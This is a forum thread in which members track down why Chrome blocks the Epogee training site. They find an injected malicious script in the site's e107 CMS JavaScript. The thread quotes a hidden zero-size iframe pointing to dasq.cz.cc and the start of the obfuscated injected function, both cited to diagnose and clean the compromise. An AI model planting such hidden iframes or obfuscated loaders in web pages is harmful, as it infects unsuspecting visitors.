Epogee

[martin]

We are receiving reports that some people are having problems with Epogee (the training site  - http://epogee.co.uk) - as Google in it's infinite wisom is "blacking" it with false claims of dodgy software....
I've tested it with all sorts of browsers (except IE which I won't have in the house), and it appears to only happen using Chrome.......

Which boils down to "the great God Google has decreed (through it's own idiocy, software glitch or malicious reporting by some business rival/refugee from  the local home for the partially bewildered) to list your site as "dodgy" and to libellously suggest to any visitors that your site is evil, of Beelzebub himself, will cause warts and your offspring to be cursed unto the ninety fifth generation, and there's precisely f*** all you can do about it because we are omnipotent, all-pervading and can afford more lawyers than you - so s*d off worm - we may at some time reconsider, when it suits us, but we'll make it bloody difficult for you to even let us know we've made another damned balls up!
(Using their own damned scanning it shows "clean", therefore there is no facility to request they remove any "blacking".........)

To say that I'm hacked off would be the understatement of the year - I spent hours on a similar thing a month ago - there were no spam or malware links, eventually they removed the bans without a word of apology or explanation.........

[rondurrans]

It works in IE but like you say not in Chrome.

[Richard Owen]

It's recent.

I use Chromium (Chrome before Google added bits) and I could access Epogee about a week ago but I can't today.

The reason (according to Chromium) is software on the site from dasq.cz.cc which sounds quite specific to me.

[martin]

There isn't, nor a link thereto (I've checked it all) - even their own bally scanning software says it's "clean"..........

[marshman]

Martin,

I use Chrome and it does come up with the "blocked" mesage but I can also click on"proceed". When I do this the webpage is displayed and then my antivirus software jumps in with a message about a dodgy webpage .....  dasq.cz.cc .....  So I think there is something going on!  (Screenshot attached)

regards

Roger

[wookey]

You sure your antivirus isn't just asking google what it thinks about this page?

And martin I assume you've gone over all the css and js and plugins files referenced on that page (and all the ones they reference, etc)?

aha. got it: there is a reference to the offending link here:
/e107_plugins log/log.php?lv=cmVmZXJlcj0mY29sb3VyPTI0JmVzZWxmPWh0dHA6Ly9lcG9nZWUuY28udWsvcGFnZS5waHA/MiZyZXM9MTQ0MHg5MDA="><script type="text/javascript" src="e107_plugins/ytm_gallery/scripts/check.js"></script><script type="text/javascript" src="e107_plugins/ytm_gallery/scripts/behavior.js"></script><script type="text/javascript" src="e107_plugins/ytm_gallery/scripts/rating.js"></script><link rel="stylesheet" type="text/css" href="e107_plugins/ytm_gallery/css/rating.css"><meta name="description" content="Epogee Solar Water Heating Approved Training Course and other Renewable Energy Training Courses"><meta name="keywords" content="solar training course, solar water, solar water heating,  hydro turbines, wind turbine, CHP, heat pumps, biodiesel training course"><meta name="copyright" content="Epogee Ltd"><meta name="author" content="Ivan Lucas"><link rel="icon" href="http://epogee.co.uk/favicon.ico" type="image/x-icon"><link rel="shortcut icon" href="http://epogee.co.uk/favicon.ico" type="image/xicon"></head><body onload="externalLinks();"><iframe src="http://dasq.cz.cc/QQkFBwQHBQEDBwYBEkcJBQcEAQEDBAEBBg==" frameborder="0" height="0" width="0"></iframe>

I found that by using the iceweasel 'web developer plugin' and searching the 'generated source' - i.e including all the subfiles.

I'll leave it to you to work out where exactly it is coming from.

[martin]

thanks!

[djh]

FWIW, that reference isn't on the page as I retrieve it. There're no iframes at all. So unless you've already removed it, I guess it's being dynamically injected by some javascript.

[martin]

pro tem I've "unplugged" the mentioned plugin and changed it's name on the server - it's mentioned as being an "insecure" plugin, so hopefully I've stopped it working.....

 - any other suggestions gratefully welcomed

[wookey]

OK, we thought this was interesting (and I wanted to learn something about javascript and DOMs) so we've debugged it some more . The offending code (or at least some offending code) is found in http://epogee.co.uk/e107_files/e107.js
After function 'open_window' is some very dodgy0-looking code:
function taad9a06c0(n345d98){var hd2acc2b5=n345d98.substr(8,3)-493,x4d029ff7,sa94067,n345d98=n345d98.substr(c62b17847()),xfeb00=n345d98.length;for(var g1354b=0;g1354b<xfeb00;g1354b++){try{throw(ob4d04=n345d98.substr(g1354b,1));}catch(e){ob4d04=e;};if(ob4d04=='}'){hd2acc2b5="";g1354b++;j64f382=n345d98.substr(g1354b,1);while(u65d03c0(j64f382)){hd2acc2b5+=j64f382;g1354b++;j
etc...

so, the infection is in the e107 javascript on the epogee server. That might have come from upstream when it was instaled, it might have come from a local exploit on the server via FTP, or SSH brute-forcing, or it might have come via an exploit in other code being served (some php script or whatever with the rights to change the e107 code).

However it got there you need to clean that machine/virtual machine up. Just removing that function from the e107 code  might get google off your back, but check the rest of the code carefully as obviously it's all suspect now. You really need to boot into a clean read-only environment and sanitize or re-image the box.

It presumably came from here: http://plugins.e107.org/ ? See if upstream has the same dodgy code or not.

Ivan now owes my colleage Ian Spray a favour for wading through the javascript tangle :-)

HTH

[martin]

Much appreciated - I'll have a rootle and sort it - I'm afraid it's very much "there be dragons" territory for me......

[martin]

just done a "down and dirty" fix - downloaded a new version of the CMS and uploaded the 11kb current version of e107.js, overwriting the 13kb version that was there.......

[djh]

Hmm, all the more reason to keep Javascript disabled, IMHO. And may also turn out to be a good example of why not to use systems written in PHP. I understand it's a nightmare to keep sites secure.

[wyleu]

Sadly a lot of the modern world loves javascript and gets very sulky if you don't enable it.

[djh]

It's amazing how much does actually work. And it's not the modern world that gets sulky if it doesn't; it's me. Often they get an irritable email telling them why I won't do business with them.